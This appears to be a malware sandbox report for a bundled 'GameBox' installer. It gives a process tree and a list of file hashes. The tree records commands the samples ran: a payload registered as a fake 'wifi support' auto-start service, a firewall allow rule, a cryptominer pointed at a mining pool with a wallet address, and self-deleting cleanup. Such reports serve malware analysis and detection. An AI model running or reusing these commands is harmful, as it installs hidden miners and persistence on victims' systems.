                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{218e3b72-66ac-3b41-87fc-f82ce7a50019}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:7784
                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3508
                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4616
                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3576
                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5240
                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:7996
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4848
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10DF.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\10DF.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6548
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1209.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1209.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4652
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1391.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1391.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:7848
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1632.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1632.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:7360
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 1632.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1632.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2040
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /im 1632.exe /f
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:4872
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:7152
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1C4D.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1C4D.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:6760
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2007.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2007.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:7844
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\29DC.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\29DC.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:6332
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2EBF.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2EBF.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:7104
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\36FD.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\36FD.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:7900
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:7400
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3D57.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3D57.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:7896
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\agmavroz\
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5188
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wfrxhcyo.exe" C:\Windows\SysWOW64\agmavroz\
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:5008
                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" create agmavroz binPath= "C:\Windows\SysWOW64\agmavroz\wfrxhcyo.exe /d\"C:\Users\Admin\AppData\Local\Temp\3D57.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4972
                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" description agmavroz "wifi internet conection"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4496
                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" start agmavroz
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:5268
                                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4196
                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5084
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:6160
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:5140
                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:7380
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:7916
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\agmavroz\wfrxhcyo.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\agmavroz\wfrxhcyo.exe /d"C:\Users\Admin\AppData\Local\Temp\3D57.exe"
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:5100
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5356
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:7808
                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6004
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6976
                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:856
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ajeivgs
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\ajeivgs
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4816

                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            4abfaa5c65ef1bda178bb0ae3532454c

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            21da67c8bf7c02917d6e41de07c2233c4a238035

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            a8de191a0b69f52442075daad2b131a75ec014b81779198e4d7c002d5ff5cb89

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            507539c7930d8fda8c6d33b942938094e4b460b91ccd371e46331bce7f49cce3d90f2bc2a608ec7bacabc127038f5f4a46f23411fe2f178a2cdb7ea0ab4f2561

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            4abfaa5c65ef1bda178bb0ae3532454c

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            21da67c8bf7c02917d6e41de07c2233c4a238035

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            a8de191a0b69f52442075daad2b131a75ec014b81779198e4d7c002d5ff5cb89

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            507539c7930d8fda8c6d33b942938094e4b460b91ccd371e46331bce7f49cce3d90f2bc2a608ec7bacabc127038f5f4a46f23411fe2f178a2cdb7ea0ab4f2561

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            3f9d188595f40d91b8e7c4634f89c82a

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            42a4c6ded84467f59e8a0e51f2b6295bb0171994

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            1e9fdba9e84dedcfdc3f69862350e56ffe8afbdcde704ad23959435b7fab79d3

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            41b37dc29a3e090dcd64093592137145db8a1ff60de0cd3fd6ba4949db32603aef082e9bfed0dda4bf18c4cfa57719a426f1e3dbd3cb7942b796e4c4ec0b7694

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            3f9d188595f40d91b8e7c4634f89c82a

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            42a4c6ded84467f59e8a0e51f2b6295bb0171994

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            1e9fdba9e84dedcfdc3f69862350e56ffe8afbdcde704ad23959435b7fab79d3

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            41b37dc29a3e090dcd64093592137145db8a1ff60de0cd3fd6ba4949db32603aef082e9bfed0dda4bf18c4cfa57719a426f1e3dbd3cb7942b796e4c4ec0b7694

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7deb5748d60dd5ee15d411d553dbaed4

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            21f5d22e9dc3e090e87c3c825c3615d5d6932ac1

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            f0d7ffe237549994c5751933d545c8e7e5789259495e711be439f1c1411c5f08

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            73b38f63d8752b8b79a99f5548fdc0fb74605caaba551e624a29d5b246e64396c9ec1dd07ecf2da5abb2ebb8529998a2d6cdf1bacbbce51349652d856e81e981

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7deb5748d60dd5ee15d411d553dbaed4

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            21f5d22e9dc3e090e87c3c825c3615d5d6932ac1

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            f0d7ffe237549994c5751933d545c8e7e5789259495e711be439f1c1411c5f08

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            73b38f63d8752b8b79a99f5548fdc0fb74605caaba551e624a29d5b246e64396c9ec1dd07ecf2da5abb2ebb8529998a2d6cdf1bacbbce51349652d856e81e981

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            86f84b4e0896b69595c96c0b47730aba

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            701d48aac341abfff6a6f7e42d4a2625dfd5b2ed

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            f7364d427d78c94e17f33b7d34b63c553dcdd89dd568dae3f25812ea33ce7a30

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ea70f8d8d4cdf4ff0a489de42f1f846a0e64865787b3b24f24988fecd93eaa045811675073bc9546df25fd5820f667cc7d0654e7071b97de48f9d730f35086fc

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            86f84b4e0896b69595c96c0b47730aba

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            701d48aac341abfff6a6f7e42d4a2625dfd5b2ed

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            f7364d427d78c94e17f33b7d34b63c553dcdd89dd568dae3f25812ea33ce7a30

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ea70f8d8d4cdf4ff0a489de42f1f846a0e64865787b3b24f24988fecd93eaa045811675073bc9546df25fd5820f667cc7d0654e7071b97de48f9d730f35086fc

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7d5fcdcba8c94cb9e69f3682fb79bfb6

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            9dfb96ecc4aed70497592e14e3eb7d05b2f2ed29

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            e1f48f8a51b4d8f665f04f2201d67f1ebba80fffd765b00e832d3f683a5a30d7

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            b379282451e598d432bc3f73d586441660cacbc61dbc7bf5c3241e035d3c40305b42968035cbd55d82f87b30ecfe41cf302e79408a3a46c078ce7cec51e3fa50

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            7d5fcdcba8c94cb9e69f3682fb79bfb6

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            9dfb96ecc4aed70497592e14e3eb7d05b2f2ed29

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            e1f48f8a51b4d8f665f04f2201d67f1ebba80fffd765b00e832d3f683a5a30d7

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            b379282451e598d432bc3f73d586441660cacbc61dbc7bf5c3241e035d3c40305b42968035cbd55d82f87b30ecfe41cf302e79408a3a46c078ce7cec51e3fa50

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            c07a49b77c116949efedc6f443957ae3

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            c67a3ac1dc5a45ac5ca84b035c785ffe0fc1c290

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            b22b057cc2020cfb5cf00f4d8e54a5d4f709babbdc2a03b9e21b38fee73c80be

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            d557c45621a9ab5be12034810fdaa39c24764e227b42c4d2e16fc9f05a7fd01b118a237c16777e6b3c4f1eddb268904bb4d3d09ea0a284729e2ae1a4ef13afd0

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            c07a49b77c116949efedc6f443957ae3

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            c67a3ac1dc5a45ac5ca84b035c785ffe0fc1c290

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            b22b057cc2020cfb5cf00f4d8e54a5d4f709babbdc2a03b9e21b38fee73c80be

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            d557c45621a9ab5be12034810fdaa39c24764e227b42c4d2e16fc9f05a7fd01b118a237c16777e6b3c4f1eddb268904bb4d3d09ea0a284729e2ae1a4ef13afd0

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            28b20d90d1efa7800697bc323b01a378

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            8ed124ddc8a7861df1822196d0929908ee010528

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            cdc9a15859638b1abfa09483088b78bbf51ae92c6f9434a92f1ea7d93122de69

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            858c4e4596611b9ff04461adbd2c0bc01077829e246367d5c7185729c3aaf7bf185f6d69d05f52ca671320f2b6a72e70612422df7e0dffd4b3f096c96b96dec6

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            28b20d90d1efa7800697bc323b01a378

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            8ed124ddc8a7861df1822196d0929908ee010528

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            cdc9a15859638b1abfa09483088b78bbf51ae92c6f9434a92f1ea7d93122de69

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            858c4e4596611b9ff04461adbd2c0bc01077829e246367d5c7185729c3aaf7bf185f6d69d05f52ca671320f2b6a72e70612422df7e0dffd4b3f096c96b96dec6

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            405f32d7d1c647b66c3f6b9a5355791a

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            e242181372ce53855995de4bacc9cbf340ec081f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            3b4c4c4e34e28d067dce529db28cd17d85365bbf0934afead71aa034a115163a

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ab61b02b542c3f209fb9172fbbb79747eb93b48d6a5b1871b7bdace0ad0fc0aa9550504698ed1457f9eb5436c19b0ffec1adda9fa94aebab7452316bb53f6e25

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            405f32d7d1c647b66c3f6b9a5355791a

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            e242181372ce53855995de4bacc9cbf340ec081f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            3b4c4c4e34e28d067dce529db28cd17d85365bbf0934afead71aa034a115163a

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ab61b02b542c3f209fb9172fbbb79747eb93b48d6a5b1871b7bdace0ad0fc0aa9550504698ed1457f9eb5436c19b0ffec1adda9fa94aebab7452316bb53f6e25

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            2317ac04c44eb878dabed59a2e1d31d5

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            533a25332ff5f12da218f8dad835289701e3349e

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            d6f91032cf32435dc6bd313cfe7f8c8889b21efae088cc2f86f44e4e17a56076

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ff238556bdc8291f426f51735d974aeb2e9c284e7871628798d97b6eff078229909e16eb5232230eec21c5fca185de4e5847156840fc70fc6a3d2d3676c65bbf

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            2317ac04c44eb878dabed59a2e1d31d5

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            533a25332ff5f12da218f8dad835289701e3349e

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            d6f91032cf32435dc6bd313cfe7f8c8889b21efae088cc2f86f44e4e17a56076

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            ff238556bdc8291f426f51735d974aeb2e9c284e7871628798d97b6eff078229909e16eb5232230eec21c5fca185de4e5847156840fc70fc6a3d2d3676c65bbf

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            db697ca3d7452b522d8260c7ec2a2017

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            bcc4ba0fad283e127e3675ac48aa31ecc76a103f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            e8c153bf71ba61edec1ff5025d79688b7ffbb963f21532ddbcc3c4a1cbc87a24

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            64c58ef74acf4953d44ea4dfde26a6ec89dfd4adbb930a9cdc2624534f349ee735b8ee14b2ad0e7ebc857a678102dadbfcb9d10940bc83239f0c2ef86f784cef

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            db697ca3d7452b522d8260c7ec2a2017

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            bcc4ba0fad283e127e3675ac48aa31ecc76a103f

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            e8c153bf71ba61edec1ff5025d79688b7ffbb963f21532ddbcc3c4a1cbc87a24

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            64c58ef74acf4953d44ea4dfde26a6ec89dfd4adbb930a9cdc2624534f349ee735b8ee14b2ad0e7ebc857a678102dadbfcb9d10940bc83239f0c2ef86f784cef

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            85ef2a29052e07e6624c274fe21a7854

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            ed206c8fcbf15ef2589bf24beb4774d35caea807

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            db7486e8c1dd51755a0706ac9bb389e0dac668d222c1ac443c6192e0cfe19b8e

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            939da4129696d2ab515042e6be9b457b85f7c2595e2247b5541133b80ad21b81b80734e5b9201ba1c83556c388ad32b59e08543e412c2476f91cd33eec1cec19

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            85ef2a29052e07e6624c274fe21a7854

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            ed206c8fcbf15ef2589bf24beb4774d35caea807

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            db7486e8c1dd51755a0706ac9bb389e0dac668d222c1ac443c6192e0cfe19b8e

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            939da4129696d2ab515042e6be9b457b85f7c2595e2247b5541133b80ad21b81b80734e5b9201ba1c83556c388ad32b59e08543e412c2476f91cd33eec1cec19

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            871dfa6b9a56ac4bf9feae18018b4e4f

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            4c928426bb81ceec27d90a3970695416e34fcdb8

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            1e71a711db951d5c229e6e183315a3d6788be7386c28027b249fe979f02f9922

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            d887403d4b77efb3408d8f6662598a6b0e2ae8fc8719b822903ded845f66c57829a490ac8129165ca0d5786ba33c623e28d1fc297608f86a72851120a56522fa

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            871dfa6b9a56ac4bf9feae18018b4e4f

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            4c928426bb81ceec27d90a3970695416e34fcdb8

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            1e71a711db951d5c229e6e183315a3d6788be7386c28027b249fe979f02f9922

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            d887403d4b77efb3408d8f6662598a6b0e2ae8fc8719b822903ded845f66c57829a490ac8129165ca0d5786ba33c623e28d1fc297608f86a72851120a56522fa

                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            871dfa6b9a56ac4bf9feae18018b4e4f

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            4c928426bb81ceec27d90a3970695416e34fcdb8

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            1e71a711db951d5c229e6e183315a3d6788be7386c28027b249fe979f02f9922

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            d887403d4b77efb3408d8f6662598a6b0e2ae8fc8719b822903ded845f66c57829a490ac8129165ca0d5786ba33c623e28d1fc297608f86a72851120a56522fa

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                            6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                            cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                            045bd044b4bbb4008810fc4b8ee60158

                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                            fe9f19d00fd0ed3584313797d21a4d53023d9418

                                                                                                                                                                                                                                            SHA256

